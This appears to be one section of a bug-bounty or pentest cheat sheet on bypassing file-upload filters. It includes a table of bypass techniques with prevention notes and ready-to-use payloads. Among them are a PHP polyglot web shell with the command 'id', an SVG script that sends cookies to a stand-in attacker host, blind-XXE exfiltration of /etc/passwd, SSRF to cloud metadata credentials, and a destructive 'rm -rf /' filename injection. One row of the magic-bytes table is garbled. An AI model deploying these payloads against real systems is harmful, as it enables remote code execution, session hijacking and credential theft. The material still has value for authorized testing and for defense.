9. FILE UPLOAD
Content-Type Bypass
filename=shell.php, Content-Type: image/jpeg → server trusts Content-Type
filename=shell.phtml, shell.pHp, shell.php5 → extension variants
File Upload Bypass Techniques (10 techniques)
| Attack | How | Prevention |
|---|---|---|
| Extension bypass | shell.php.jpg, shell.pHp, shell.php5 | Allowlist + extract final extension |
| Null byte | shell.php%00.jpg | Sanitize null bytes |
| Double extension | shell.jpg.php | Only allow single extension |
| MIME spoof | Content-Type: image/jpeg with .php body | Validate magic bytes, not MIME header |
| Magic bytes prefix | Prepend GIF89a; to PHP code | Parse whole file, not just header |
| Polyglot | Valid as JPEG and PHP | Process as image lib, reject if invalid |
| SVG JavaScript | <svg onload="..."> | Sanitize SVG or disallow entirely |
| XXE in DOCX | Malicious XML in Office ZIP | Disable external entities |
| ZIP slip | ../../../etc/passwd in archive | Validate extracted paths |
| Filename injection | ; rm -rf / in filename | Sanitize + use UUID names |
Magic Bytes Reference
| Type | Hex |
|---|---|
| JPEG | FF D8 FF |
| PNG | 89 50 4E 47 0D 0A 1A 0A |
| GIF | 47 49 46 38 |
25 50 44 46 | |
| ZIP/DOCX/XLSX | 50 4B 03 04 |
Stored XSS via SVG
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.domain)</script>
</svg>
Related Skills & Chains
hunt-rce— File upload is the most common path to RCE on classic PHP/JSP/ASPX stacks once you find a directly-served upload directory or a deserializer-fed processor. Chain primitive: polyglotGIF89a;<?php system($_GET['c']);?>bypasses magic-byte check +.phtmlextension bypasses allowlist →GET /uploads/shell.phtml?c=id→ RCE; or PHPphar://upload to a sink callingfile_exists()on the attacker-controlled path → PHP object deserialization → RCE.hunt-xxe— Office formats (DOCX/XLSX/PPTX), SVGs, and SOAP attachments are XML inside a ZIP — every upload-and-parse feature is a latent XXE candidate. Chain primitive: upload DOCX whose[Content_Types].xmlorword/document.xmlincludes a parameter-entity DTD pointing at attacker-controlled DTD → blind XXE OOB file read → exfil/etc/passwdorweb.configvia the document parser.hunt-xss— SVGs, HTML files, and PDFs uploaded then served on the same origin are stored-XSS factories. Chain primitive: upload SVG with<script>fetch('//attacker/?'+document.cookie)</script>→ victim views attachment atapp.target.com/uploads/x.svg(same origin, not sandboxed) → cookie theft → ATO via session hijack.hunt-ssrf— Image-processing libraries (ImageMagick, ffmpeg) fetch remote URLs from inside the uploaded file. Chain primitive: upload an SVG/MVG with<image xlink:href="http://169.254.169.254/latest/meta-data/iam/security-credentials/">or ffmpegconcat:http://internal/...→ SSRF to AWS IMDS → cloud creds; the ImageTragick CVE-2016-3714 family is still alive on legacy farms.security-arsenal— Reach for the file-upload bypass tree: 10-row extension/MIME/magic-byte bypass table (double-ext, null-byte, case variants,.phtml/.phar/.php5/.pht,.htaccessupload to re-enable handlers,web.configupload on IIS), SVG/MVG/SVGZ payloads, DOCX-XXE templates, ZIP-slip path traversal in archives, polyglot generators.triage-validation— Apply the Reproducibility Gate. A file successfully uploaded but never served, never executed, never parsed by anything is not a finding — it's a write-only blob. Critical RCE requires the actualwhoamiround-trip from the uploaded shell; stored XSS requires the popup firing in a victim browser, not just the file existing on disk.